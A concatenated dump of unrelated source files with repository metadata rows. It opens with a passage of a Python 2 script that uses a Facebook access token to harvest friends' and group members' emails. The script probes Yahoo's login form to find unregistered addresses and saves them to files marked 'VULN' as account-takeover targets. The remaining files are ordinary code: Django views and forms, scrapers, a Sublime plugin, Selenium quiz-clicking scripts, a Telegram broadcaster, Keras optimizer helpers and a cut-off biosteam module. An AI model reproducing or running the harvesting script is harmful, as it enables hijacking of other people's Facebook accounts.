print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
siapa()
|
[
"[email protected]"
] | |
b27f35b93e426e634255d190bc26186e448a325a
|
98892d10a50f7032238aed257d690ba0d7d5ef2b
|
/basicREST/views.py
|
90e98b8904bdcde7526d173e11944c71da61e726
|
[] |
no_license
|
ivishalvarshney/djangoREST
|
f21f7f4a83437e8eefb91980555bf63dbdfd3d69
|
30f31546f4566d5b1ec8e2a7a7c34096693dc89c
|
refs/heads/master
| 2020-04-17T07:44:52.964395 | 2019-01-29T12:40:38 | 2019-01-29T12:40:38 | 166,382,332 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,115 |
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
import json
from django.http import QueryDict
def index(request):
return HttpResponse("Hello, world. You're at the REST index.")
def get(request):
if request.method == 'GET':
value = request.GET.get('name', "blahblah")
return HttpResponse("this is get request." + value)
else:
return HttpResponse("Invalid request.")
def post(request):
if request.method == 'POST':
value = str(request.POST.get('name', "blahblah"))
return HttpResponse("this is POST request." + value)
else:
return HttpResponse("Invalid request.")
def put(request):
if request.method == 'PUT':
put = QueryDict(request.body)
description = put.get('name')
return HttpResponse("this is PUT request." + description)
else:
return HttpResponse("Invalid request.")
def delete(request):
if request.method == 'DELETE':
delete = QueryDict(request.body)
description = delete.get('name')
return HttpResponse("this is DELETE request." + description)
else:
return HttpResponse("Invalid request.")
|
[
"[email protected]"
] | |
4ef58c2409ab968d93a3503e6b30e0956b126cb9
|
4b75b77d262fce1752b5a6d224d3a398ab9fe6f6
|
/ClipSearcher/venv/Lib/site-packages/twitch/helix/models/__init__.py
|
587b7577b7184b47de4f3c6641ffa1e2ebaf872a
|
[] |
no_license
|
Tathomp/TwitchClipScrapper
|
46f11bd399f45d574e1c2aa06010843dcebe4cfc
|
c0d8dfff2677dbeb42a796a9e8147059d2088996
|
refs/heads/main
| 2023-01-04T19:43:03.119768 | 2020-10-22T23:26:01 | 2020-10-22T23:26:01 | 306,475,412 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 108 |
py
|
from .stream import Stream
from .user import User
from .video import Video
__all__ = [Stream, User, Video]
|
[
"[email protected]"
] | |
6eb51316bd90d06bb54e6bc81ddd6e710b4e2736
|
5cd687035dbcbc72ef479ad58d80a7c1b085f950
|
/mangaupdates
|
d82bd772a5290394f1459ec948a63edf0e4400fa
|
[] |
no_license
|
otommod/bin
|
25db0680294008e4542fe6f1f60a7dba11b6aa2f
|
3a31cff03b95a6de39d4ecbc05e58db25aebcb1b
|
refs/heads/master
| 2021-01-20T21:01:12.290536 | 2018-04-22T23:44:43 | 2018-04-22T23:44:43 | 101,743,304 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,159 |
#!/usr/bin/env python3
import sys
from collections import namedtuple
from datetime import datetime
from concurrent.futures import Future, ThreadPoolExecutor, as_completed
import requests
from bs4 import BeautifulSoup
# ReleaseInfo = namedtuple('ReleaseInfo', 'date link volume chapter group')
class ReleaseInfo(namedtuple('ReleaseInfo',
'date manga volume chapters group')):
@classmethod
def from_tr_bs(cls, bs):
date, manga, volume, chapters, group = bs('td')
try:
date = datetime.strptime(date.text, '%m/%d/%y')
except ValueError:
date = datetime.min
manga = manga.text
volume = volume.text
chapters = chapters.text
group = group.text
return cls(date, manga, volume, chapters, group)
def __str__(self):
return '{0} c.{1} ({2.days}d) by {3}'.format(
self.manga,
self.chapters,
datetime.now() - self.date,
self.group)
def download_page(series_id, page=1, ascending=True):
r = requests.get('https://www.mangaupdates.com/releases.html',
params={'search': series_id, 'page': page,
'asc': 'asc' if ascending else 'desc',
'perpage': 100, 'stype': 'series'})
return BeautifulSoup(r.text, 'html.parser')  # explicit parser; bs4 warns (and may vary) if omitted
def extract_pagenum(bs):
pages = [t for t in bs('td', class_='specialtext')
if t.text.startswith('Pages')]
if pages:
pages = pages[0].contents[0].strip(' Pages()')
else:
pages = 1
return int(pages)
def extract_releases(bs):
releases_table_title = bs.find('td', class_='releasestitle').parent
releases_table = releases_table_title.find_next_siblings('tr')
releases_table = [tr for tr in releases_table if len(tr.contents) == 11]
return [ReleaseInfo.from_tr_bs(tr) for tr in releases_table]
def get_releases_page(series_id, page):
return extract_releases(download_page(series_id, page))
def get_pagenum(series_id):
bs = download_page(series_id)
pages = extract_pagenum(bs)
releases = extract_releases(bs)
return releases, pages
def main(args):
ids = [int(i) for i in args]
with ThreadPoolExecutor(max_workers=10) as executor:
pagenums = {}
for id in ids:
pagenums[executor.submit(get_pagenum, id)] = id
results = {}
for s in as_completed(pagenums):
id = pagenums[s]
first_page, pages = s.result()
# According to the doc, you are not meant to do that (unless you
# are writing tests or Executors), however, to keep the code
# simple, I'm doing exactly that.
first_future = Future()
first_future.set_result(first_page)
results[id] = [first_future]
for p in range(2, pages + 1):
results[id].append(executor.submit(get_releases_page, id, p))
for i in ids:
for p in as_completed(results[i]):
for r in p.result():
print(r)
if __name__ == '__main__':
main(sys.argv[1:])
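# --- Hedged usage sketch (not part of the original script) ---
# Invoke with one or more MangaUpdates series ids; the ids below are placeholders:
#   ./mangaupdates 33 12345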
|
[
"[email protected]"
] | ||
3af8d10bbadf2fdca7a947a941b05ec04733c02e
|
3b4306f01497a65c539e68f7dde61b03d66feee4
|
/Server/play/server/migrations/0005_auto_20170216_1702.py
|
b9ad0de8478e2a3c9508ed8ae5f10e0ac74ff9d2
|
[] |
no_license
|
Ricky1O11/Play
|
4b17914cec081064caac64454fa6ccf9e62c44aa
|
5d153efded279179c7c0f0541b8676ae7a2d8e9e
|
refs/heads/master
| 2021-01-11T23:49:56.210161 | 2017-06-17T14:30:59 | 2017-06-17T14:30:59 | 78,632,836 | 0 | 1 | null | 2017-04-19T13:59:39 | 2017-01-11T11:32:53 |
CSS
|
UTF-8
|
Python
| false | false | 510 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2017-02-16 16:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('server', '0004_matches_status'),
]
operations = [
migrations.AlterField(
model_name='matches',
name='time',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now),
),
]
|
[
"[email protected]"
] | |
e1a45c0ba518cfbb372a72ab3143bef40ec1f554
|
a6645dd580d8d3dcf56f178822628d261ed309bd
|
/LastModifiedIndicator.py
|
96eb8e4a065bff2bee64968ceca9556c8df76015
|
[
"MIT"
] |
permissive
|
joemay/SublimeLastModifiedIndicator
|
ddb7f68e64fb4ea45b8c4c1f3922938608b17f05
|
03d6e404b6bcf49ff94b8086bf5adce0055799c0
|
refs/heads/master
| 2021-01-18T00:21:26.629616 | 2013-07-31T18:55:43 | 2013-07-31T18:55:43 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,532 |
py
|
import sublime_plugin
import sublime
import os
BASE_PATH = os.path.abspath(os.path.dirname(__file__))
IMG_PATH = os.path.join('..', os.path.basename(BASE_PATH), 'img')
settings = sublime.load_settings('LastModifiedIndicator.sublime-settings')
class LastModifiedIndicator(object):
def __init__(self, view):
self.view = view
self.sel = self.view.sel()
self.has_sel = len(self.sel) == 1
@property
def _range(self):
return range(-3, 4) if settings.get('last_modified_indicator_multiline', True) else range(0, 1)
def run(self):
if self.has_sel:
self.erase_regions()
line = self.view.rowcol(self.view.sel()[0].begin())[0]
for i in self._range:
_line = line + i
if _line < 0:
continue
point = self.view.full_line(self.view.text_point(_line, 0))
if os.path.exists(os.path.join(BASE_PATH, 'img', '%d%s' % (abs(i), '.png'))):
self.view.add_regions('lmi-outline-%d' % i, [point, ], 'lmi.outline.%d' % i,
os.path.join(IMG_PATH, str(abs(i))), sublime.HIDDEN)
def erase_regions(self):
if self.has_sel:
for i in range(-3, 4):
self.view.erase_regions('lmi-outline-%d' % i)
class LastModifiedIndicatorEventHandler(sublime_plugin.EventListener):
def on_modified(self, view):
if settings.get('last_modified_indicator', True):
LastModifiedIndicator(view).run()
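# --- Hedged settings sketch (not part of the original file) ---
# The two keys read via settings.get() above, shown with their defaults, as
# they would appear in LastModifiedIndicator.sublime-settings:
#
# {
#     "last_modified_indicator": true,
#     "last_modified_indicator_multiline": true
# }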
|
[
"[email protected]"
] | |
9b0d5d65cf309b37a68a89e87ed66843ec5ca8ce
|
ecace2496db4d51e19c3507295db2be25fc2474b
|
/for_test.py
|
1ee787f062d8273a11dced60d6280bc6d0631f59
|
[] |
no_license
|
calior/selenium
|
37a077a8ba4cd3265f066c1e853074b9caad4e1c
|
9cd93fa3a14e1e747fd0435f82567760ed50370d
|
refs/heads/master
| 2021-01-13T03:55:19.086355 | 2016-08-01T03:34:24 | 2016-08-01T03:34:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,858 |
py
|
from selenium import webdriver
from time import sleep
from get_Screen import get_Screen
from isElementExist import isElementExist
def before_xuezha(driver):
flag = True
#pre-test: loop through the question pages (the "slacker" route)
while(flag):
try:
#print('herezuoti')
if flag == isElementExist(driver,'id','continue'):
print ("------00000------------------------")
get_Screen(driver)
#driver.find_element_by_id('continue').click()
flag = False
#capture the pre-test screenshot
driver.find_element_by_xpath('/html/body/div[4]/div').click() #click Next on the question page (continue-submit-answer)
driver.find_element_by_class_name('layui-layer-btn0').click() #click OK
#print('走到这了m')
except Exception as e:
print(e)
def while_lianxi_no(driver):
flag = True
while(flag):
sleep(2)
print ("===================22222222===============")
driver.find_element_by_id('continue').click()#click Next on the video page
sleep(5)
print ("===================33333333===============")
sleep(2)
driver.find_element_by_id('continue').click()#click Next on the lecture-notes page
print ("===================444444===============")
sleep(2)
flag1 = True
while(flag1):
sleep(2)
print ("===================55555===============")
driver.find_element_by_id('continue-submit-answer').click() #click Next on the practice questions
driver.find_element_by_class_name('layui-layer-btn0').click() #click OK
driver.find_element_by_id('continue-submit-answer').click() #click Next on the answer-analysis page
print ("===================6666===============")
sleep(2)
if(flag1 == isElementExist(driver,'id','continue')):
get_Screen(driver)
driver.find_element_by_id('continue').click()
flag1 = False
elif(flag == isElementExist(driver,'link','专题报告')):
get_Screen(driver)
flag = False
|
[
"[email protected]"
] | |
8ef8624175a17aa4a76c7c2d3978fe26aa352c4a
|
5ee8514d98c3f5f8b06129916da7f40138ddaee2
|
/src/Sanga/media/ttv.py
|
44d1939ed3645cecf4b5895ea781b4402f40ffa2
|
[
"MIT",
"Python-2.0"
] |
permissive
|
allenyummy/Sanga
|
a9acc0d98db6eae14be2bb8d640f9ae98919f601
|
ff4cc60e0fd05cac49bdf15ad8a57dfedcf75fd0
|
refs/heads/master
| 2023-07-27T07:46:32.930955 | 2021-09-01T08:54:14 | 2021-09-01T08:54:14 | 401,222,669 | 2 | 0 |
MIT
| 2021-09-01T08:54:15 | 2021-08-30T05:06:59 |
Python
|
UTF-8
|
Python
| false | false | 1,072 |
py
|
# encoding=utf-8
# Author: Yu-Lun Chiang
# Description: Get news
import logging
from typing import Dict
import json
from bs4 import BeautifulSoup
from .base import BaseMediaNewsCrawler
from ..struct import NewsStruct
logger = logging.getLogger(__name__)
class TTV(BaseMediaNewsCrawler):
"""Web Crawler for TTV News"""
def getInfo(self, link: str) -> NewsStruct:
return super().getInfo(link)
@staticmethod
def _get_script_info(
soup: BeautifulSoup,
) -> Dict[str, str]:
# take the script tag at index 1, i.e. the second application/ld+json block
script_info_str = soup.find_all("script", type="application/ld+json")[1].string
script_info_dict = json.loads(script_info_str)
logger.debug(f"SCRIPT_INFO_STR:\n {script_info_str}")
logger.debug(f"SCRIPT_INFO_DICT:\n {script_info_dict}")
return script_info_dict
@staticmethod
def _get_content(
soup: BeautifulSoup,
) -> str:
content = soup.find("div", itemprop="articleBody").text
logger.debug(f"CONTENT:\n {content}")
return content
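# --- Hedged usage sketch (not part of the original file) ---
# Assuming BaseMediaNewsCrawler.getInfo() fetches the page and dispatches to
# the static helpers above; the article URL is a placeholder, not a real id.
#
# crawler = TTV()
# news = crawler.getInfo("https://news.ttv.com.tw/news/<article-id>")  # hypothetical URL
# print(news)  # NewsStruct built from the ld+json block and the article body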
|
[
"[email protected]"
] | |
755ce3602c7d4642c4b0aca6891d7446594eb0b1
|
48fff0f472066dc6e5b5a15d16dcc33738e7a2c2
|
/train2/chatbot/broadcast.py
|
027badb7eddef0c0ba8411820cb20092bd9088f5
|
[] |
no_license
|
hasadna/OpenTrainCommunity
|
228a4f078829f6653e62db1294da01488be55b64
|
3c7a941b730160c40cc400ed94ed77ffa9189f0a
|
refs/heads/master
| 2023-01-23T14:39:10.462114 | 2020-06-08T11:36:27 | 2020-06-08T11:36:27 | 19,729,986 | 23 | 16 | null | 2023-01-13T22:57:43 | 2014-05-13T07:34:15 |
HTML
|
UTF-8
|
Python
| false | false | 1,036 |
py
|
import logging
from django.conf import settings
import telegram
from django.template.loader import render_to_string
from . import models
logger = logging.getLogger(__name__)
def broadcast_new_report_to_telegram_channel(report: models.ChatReport):
message = render_to_string('chatbot/new_report_message.html', context={
'report': report,
})
_broadcast(message)
def broadcast_wrong_report_to_telegram_channel(report: models.ChatReport):
message = render_to_string('chatbot/wrong_report_message.html', context={
'report': report,
})
_broadcast(message)
def _broadcast(message: str):
channel = '@' + settings.TELEGRAM_CHANNEL
try:
bot = telegram.Bot(settings.TELEGRAM_TOKEN)
bot.send_message(
channel,
message,
parse_mode='html',
disable_web_page_preview=True)
logger.info("Broadcasting to channel %s:\n%s", channel, message)
except Exception:
logger.exception('Failed to broadcast to channel')
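# --- Hedged configuration sketch (not part of the original file) ---
# Django settings this module assumes exist; the values are placeholders.
#
# TELEGRAM_TOKEN = "123456789:AAF..."     # bot token
# TELEGRAM_CHANNEL = "opentrain_reports"  # channel name; '@' is prepended above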
|
[
"[email protected]"
] | |
1a4331aa03052d0136ac9424cf6c3d97e49dc9fc
|
4a2bd14eb54a5447b9b5c67df97d9237cd506bd7
|
/setup.py
|
61fde968a06933af9c27eabc838e71e919e782a8
|
[] |
no_license
|
GapData/bokehutils
|
85363af5d1575983fe980a7c5a269eab354d168d
|
deadedd7a8a2210beeb8cce226d7d566f84a6f11
|
refs/heads/master
| 2021-05-29T13:40:12.105135 | 2015-09-30T19:40:03 | 2015-09-30T19:40:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,608 |
py
|
# Copyright (C) 2015 by Per Unneberg
from setuptools import setup, find_packages
import glob
import os
import versioneer
INSTALL_REQUIRES = [
'sphinx>=1.3',
'pytest',
'pytest-cov>=1.8.1',
'bokeh>=0.10.0',
]
try:
# Hack for readthedocs
if 'readthedocs' not in os.path.dirname(os.path.realpath(__file__)):
pass
else:
print("readthedocs in path name; assuming we're building docs @readthedocs")
INSTALL_REQUIRES.append('sphinx-bootstrap-theme')
except:
pass
# Integrating pytest with setuptools: see
# https://pytest.org/latest/goodpractises.html#integrating-with-distutils-python-setup-py-test
from distutils.core import Command
# only Command is needed here; re-importing setup from distutils would shadow
# the setuptools setup imported above, which is what supports install_requires
class PyTest(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import subprocess
import sys
errno = subprocess.call([sys.executable, 'runtests.py'])
raise SystemExit(errno)
_version = versioneer.get_version()
_cmdclass = versioneer.get_cmdclass()
_cmdclass['test'] = PyTest  # register the custom command so `python setup.py test` runs runtests.py
setup(name="bokehutils",
version=_version,
cmdclass=_cmdclass,
author="Per Unneberg",
author_email="[email protected]",
description="Utility functions for working with bokeh plots",
license="MIT",
scripts=glob.glob('scripts/*.py'),
install_requires=INSTALL_REQUIRES,
packages=find_packages(exclude=['ez_setup', 'test*']),
package_data={
'bokehutils': [
'_templates/*',
'static/*',
],
})
|
[
"[email protected]"
] | |
321314e44b4f791b9d4b22fcbb22c398352b26bb
|
406043e9639bd3195f2bb952bb64e59568c1eade
|
/manage.py
|
904a6d8cf60630a0b9a3373d3075275e1a982ad3
|
[] |
no_license
|
Mattaru/Pet-shelter-django
|
2e8571c8e4f490180a69fca363734a320bb1a441
|
4f59ca3c62c0eb1462716af69f150535979094f8
|
refs/heads/master
| 2023-01-02T13:47:07.987525 | 2020-10-30T15:37:20 | 2020-10-30T15:37:20 | 308,047,259 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 670 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'animal_shelter.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
8f51618dff92b6609f174e7d9e48161f653dd784
|
fdba533d128e5fcc237abacda12de9545ddce39c
|
/keras/optimizer_experimental/optimizer_lib.py
|
d180179dde8284a872030aa0a8c1237796c3da4d
|
[
"Apache-2.0"
] |
permissive
|
hhuang97/keras
|
5949d754dcaed47df011fb4218d6552251e265e2
|
f5fea878c271e38946c6681c1c2434e72d0ab977
|
refs/heads/master
| 2021-12-24T00:01:26.759181 | 2021-12-14T18:21:47 | 2021-12-14T18:22:26 | 90,206,289 | 0 | 1 | null | 2017-05-04T00:54:28 | 2017-05-04T00:54:28 | null |
UTF-8
|
Python
| false | false | 3,775 |
py
|
"""Library of helper classes of optimizer."""
class GradientsClipOption:
"""Gradients clip option for optimizer class.
Attributes:
clipnorm: float. If set, the gradient of each weight is individually clipped
so that its norm is no higher than this value.
clipvalue: float. If set, the gradient of each weight is clipped to be no
higher than this value.
global_clipnorm: float. If set, the gradient of all weights is clipped so
that their global norm is no higher than this value.
"""
def __init__(self, clipnorm=None, clipvalue=None, global_clipnorm=None):
if clipnorm is not None and global_clipnorm is not None:
raise ValueError(f"At most one of `clipnorm` and `global_clipnorm` can "
f"be set. Received: clipnorm={clipnorm}, "
f"global_clipnorm={global_clipnorm}.")
if clipnorm and clipnorm <= 0:
raise ValueError("Clipnorm should be a positive number, but received "
f"clipnorm={clipnorm}.")
if global_clipnorm and global_clipnorm <= 0:
raise ValueError("global_clipnorm should be a positive number, but "
f"received global_clipnorm={global_clipnorm}.")
if clipvalue and clipvalue <= 0:
raise ValueError("clipvalue should be a positive number, but received "
f"clipvalue={clipvalue}.")
self.clipnorm = clipnorm
self.global_clipnorm = global_clipnorm
self.clipvalue = clipvalue
def get_config(self):
return {
"clipnorm": self.clipnorm,
"global_clipnorm": self.global_clipnorm,
"clipvalue": self.clipvalue,
}
class EMAOption:
# TODO(b/207532340): Add examples on how to use this EMAOption.
"""EMA option for optimizer class.
Attributes:
use_ema: boolean, default to False. If True, exponential moving average
(EMA) is applied. EMA consists of computing an exponential moving average
of the weights of the model (as the weight values change after each
training batch), and periodically overwriting the weights with their
moving average.
ema_momentum: float, default to 0.99. Only used if `use_ema=True`. This is
the momentum to use when computing the EMA of the model's weights:
`new_average = ema_momentum * old_average + (1 - ema_momentum) *
current_variable_value`.
ema_overwrite_frequency: int or None, default to 100. Only used if
`use_ema=True`. Every `ema_overwrite_frequency` steps of iterations, we
overwrite the model variable by its stored moving average. If None, we do
not overwrite model variables in the middle of training, and users need to
explicitly overwrite the model variable by calling
`finalize_variable_update()`.
"""
def __init__(self,
use_ema=False,
ema_momentum=0.99,
ema_overwrite_frequency=100):
self.use_ema = use_ema
if use_ema:
# Verify the arguments related to EMA.
if ema_momentum > 1 or ema_momentum < 0:
raise ValueError("`ema_momentum` must be in the range [0, 1]. "
f"Received: ema_momentum={ema_momentum}")
if ema_overwrite_frequency and (not isinstance(
ema_overwrite_frequency, int) or ema_overwrite_frequency < 1):
raise ValueError(
"`ema_overwrite_frequency` must be an integer > 1 or None. "
f"Received: ema_overwrite_frequency={ema_overwrite_frequency}")
self.ema_momentum = ema_momentum
self.ema_overwrite_frequency = ema_overwrite_frequency
def get_config(self):
return {
"use_ema": self.use_ema,
"ema_momentum": self.ema_momentum,
"ema_overwrite_frequency": self.ema_overwrite_frequency,
}
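# --- Hedged usage sketch (not part of the original file) ---
# Constructing the two option objects and round-tripping them through
# get_config(); the numeric values below are illustrative assumptions.
#
# clip = GradientsClipOption(global_clipnorm=1.0)
# assert clip.get_config()["global_clipnorm"] == 1.0
#
# ema = EMAOption(use_ema=True, ema_momentum=0.999, ema_overwrite_frequency=None)
# assert ema.get_config()["ema_momentum"] == 0.999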
|
[
"[email protected]"
] | |
bd3c3547ce4abf96e60ac062c02860678ddc568c
|
59147b0d69ee93d69d2a33e3315d3aeff569edd1
|
/selection/forms.py
|
4e2ed9316a7d479379eb1591262fe98dd8f39aaa
|
[] |
no_license
|
mansimishra007/Hostel-Management-System
|
abf1148ae83c07922ea93a7cf0272eb598addf92
|
65704ef73265226f1a247aff2a4fd2c7234ba900
|
refs/heads/main
| 2023-04-19T02:38:48.804216 | 2021-04-29T13:16:21 | 2021-04-29T13:16:21 | 362,712,183 | 0 | 0 | null | 2021-04-29T06:24:37 | 2021-04-29T06:24:36 | null |
UTF-8
|
Python
| false | false | 2,347 |
py
|
from django.contrib.auth.forms import UserCreationForm
from .models import *
from django import forms
from django.core.exceptions import ValidationError
import datetime
YEARS = list(range(2018, 2020))
class UserForm(UserCreationForm):
password1 = forms.CharField(min_length=8, max_length=30, widget=forms.PasswordInput(render_value=False))
class Meta:
model = User
fields = ['username', 'password1', 'password2']
help_texts = {
'username': 'same as your smart card id',
}
# def clean_password(self):
# password = self.cleaned_data.get('password1')
# if len(password) < 8:
# raise ValidationError('Password too short')
# return super(UserCreationForm, self).clean_password1()
class LoginForm(forms.Form):
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
class RegistrationForm(forms.ModelForm):
class Meta:
model = Student
fields = [
'student_name',
'father_name',
'smart_card_id',
'course',
'year_of_study',
'dob']
class SelectionForm(forms.ModelForm):
class Meta:
model = Student
fields = ['room']
class DuesForm(forms.Form):
choice = forms.ModelChoiceField(queryset=Student.objects.all().filter(no_dues=True))
class NoDuesForm(forms.Form):
choice = forms.ModelChoiceField(queryset=Student.objects.all().filter(no_dues=False))
class DateInput(forms.DateInput):
input_type = 'date'
class LeaveForm(forms.ModelForm):
start_date = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS))
end_date = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS))
reason = forms.CharField(max_length=100, help_text='100 characters max.',
widget=forms.TextInput(attrs={'placeholder': 'Enter Reason here'}))
class Meta:
model = Leave
fields = [
'start_date',
'end_date',
'reason']
class RepairForm(forms.ModelForm):
class Meta:
model = Room
fields = ['repair']
class RebateForm(forms.Form):
rebate = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS))
|
[
"[email protected]"
] | |
be2c52cf09bf34f008f12e37cdf45e5043e77334
|
d44a2cc528a71ba68da73d8246d00a582bd37d50
|
/django-env/bin/wheel
|
ae025c6ff6359ee62788a3c0f12a62a7306d8b96
|
[
"Apache-2.0"
] |
permissive
|
ShanghaitechGeekPie/bookshelf
|
7127a56023e7509e2c2fd53dd42aeb508fc16098
|
bc3469ecbb44723bb28ccaaccee60d211ca3f94a
|
refs/heads/master
| 2020-03-13T04:12:26.937041 | 2018-08-26T13:19:10 | 2018-08-26T13:19:10 | 130,958,787 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 250 |
#!/home/django/bookshelf/shelf/django-env/bin/python3.5
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
6a9813e8183140d4f37cce18fe72fbf348307aa9
|
e41849b424e892c0ef1325ec768f4a5aa6dc11e5
|
/biosteam/units/_multi_effect_evaporator.py
|
ae5f2bda8e39b53c5a21f2db763537ba2cc004ca
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"NCSA"
] |
permissive
|
Saurajyoti/biosteam
|
28a8548ec9c453124e31d73c4e3d628d44dad322
|
65d35586c9e40660f170e5a8aa4e4450ea171a23
|
refs/heads/master
| 2023-06-15T22:07:54.544645 | 2021-07-13T04:19:14 | 2021-07-13T04:19:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 16,479 |
py
|
# -*- coding: utf-8 -*-
# BioSTEAM: The Biorefinery Simulation and Techno-Economic Analysis Modules
# Copyright (C) 2020-2021, Yoel Cortes-Pena <[email protected]>
#
# This module is under the UIUC open-source license. See
# github.com/BioSTEAMDevelopmentGroup/biosteam/blob/master/LICENSE.txt
# for license details.
"""
"""
import numpy as np
import biosteam as bst
from .. import Unit
from .mixing import Mixer
from .heat_exchange import HXutility
from ._flash import Flash, Evaporator_PQ
from .design_tools import (
compute_vacuum_system_power_and_cost,
compute_heat_transfer_area
)
from thermosteam import MultiStream, settings
import flexsolve as flx
from warnings import warn
from .design_tools import heat_transfer as ht
__all__ = ('MultiEffectEvaporator',)
log = np.log
exp = np.exp
# Table 22.32 Product process and design (pg 592)
# Name: ('Area range (m2)', 'Cost(A) (USD)', 'U (kJ/(hr*m2*K)))', 'Material')
evaporators = {'Horizontal tube':
((9.29, 743.224),
lambda A, CE: CE*2.304*A**0.53,
4906.02,
'Carbon steel'),
'Long-tube vertical':
((9.29, 743.224),
lambda A, CE: CE*3.086*A**0.55,
8176.699,
'Carbon steel'),
'Forced circulation':
((13.935, 8000),
lambda A, CE: CE/500*exp(8.2986 + 0.5329*log(A*0.0929)-0.000196*log(A*0.0929)**2),
10731.918,
'Carbon steel'),
'Falling film':
((13.935, 371.612),
lambda A, CE: CE*7.416*A**0.55,
10220.874,
'Stainless steel tubes/Carbon steel shell')}
class MultiEffectEvaporator(Unit):
"""
Creates evaporatorators with pressures given by P (a list of pressures).
Adjusts first evaporator vapor fraction to satisfy an overall fraction
evaporated. All evaporators after the first have zero duty. Condenses
the vapor coming out of the last evaporator. Pumps all liquid streams
to prevent back flow in later parts. All liquid evaporated is ultimately
